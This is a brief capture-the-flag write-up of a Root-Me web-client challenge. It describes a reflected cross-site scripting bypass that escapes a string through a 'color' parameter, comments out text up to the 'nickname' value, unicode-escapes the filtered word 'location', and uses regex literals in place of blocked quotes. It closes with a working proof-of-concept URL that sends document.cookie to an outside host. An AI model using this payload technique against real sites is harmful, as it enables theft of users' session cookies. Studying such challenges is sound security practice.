I noticed that color Parameter can contain any chars which this is useful to get out of the scope of variable color=" , but it's limited it reflect only 3 chars
And because the value of nickname parameter is being reflect after the color we can benefit from that by making anything after color as comment until we reach the value of the nickname parameter color="/*&nickname=*/
And then we can use , to add our malicious code with window.location but the application convert location word to ( ͡° ͜ʖ ͡°) , There's a way to bypass that through use escaped unicode for a specific char in location word which will be converted to the origin format by the Javascript itself ( because () %60 and some other chars are blocked so location is better choice )
Unfortunately the double quotes and single quotes and %60 are blocked by the application so we cannot use them to assign our host as a value to location but fortunately in the javascript /Anything/ is consider as "/anything/" so we assign our host to location through /\0u.ma?cookie/+document.cookie
POC : http://challenge01.root-me.org/web-client/ch24/?nickname=*/},locati\u006fn=/\google.com?a=/%2bdocument.cookie,{//&color=%22/*&p=game&win=x
